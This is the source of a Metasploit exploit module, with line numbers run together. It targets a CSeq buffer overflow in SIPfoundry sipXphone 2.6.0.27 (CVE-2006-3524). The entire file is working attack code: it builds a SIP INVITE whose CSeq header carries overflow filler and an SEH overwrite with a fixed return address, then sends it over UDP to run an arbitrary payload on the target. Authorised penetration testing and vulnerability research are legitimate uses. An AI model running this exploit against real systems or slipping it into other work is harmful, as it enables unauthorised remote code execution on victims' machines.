Path: blob/master/modules/exploits/windows/sip/sipxphone_cseq.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Udp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',16'Description' => %q{17This module exploits a buffer overflow in SIPfoundry's18sipXphone 2.6.0.27. By sending an overly long CSeq value,19a remote attacker could overflow a buffer and execute20arbitrary code on the system with the privileges of21the affected application.22},23'Author' => 'MC',24'References' => [25[ 'CVE', '2006-3524' ],26[ 'OSVDB', '27122' ],27[ 'BID', '18906' ],28],29'DefaultOptions' => {30'EXITFUNC' => 'process',31},32'Payload' => {33'Space' => 400,34'BadChars' => "\x00\x0a\x20\x09\x0d",35'StackAdjustment' => -3500,36},37'Platform' => 'win',38'Targets' => [39[ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ],40],41'Privileged' => false,42'DisclosureDate' => '2006-07-10',43'DefaultTarget' => 0,44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)5152register_options(53[54Opt::RPORT(5060)55]56)57end5859def exploit60connect_udp6162user = rand_text_english(2, payload_badchars)63port = rand(65535).to_s64filler = rand_text_english(212, payload_badchars)65seh = generate_seh_payload(target.ret)66filler[204, seh.length] = seh6768sploit = "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"69sploit << "To: <sip:#{rhost}:#{rport}>" + "\r\n"70sploit << "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"71sploit << "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"72sploit << "Call-ID: #{(rand(100) + 100)}#{rhost}" + "\r\n"73sploit << "CSeq: " + filler + "\r\n"74sploit << "Max-Forwards: 20" + "\r\n"75sploit << "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"7677print_status("Trying target #{target.name}...")7879udp_sock.put(sploit)8081handler82disconnect_udp83end84end858687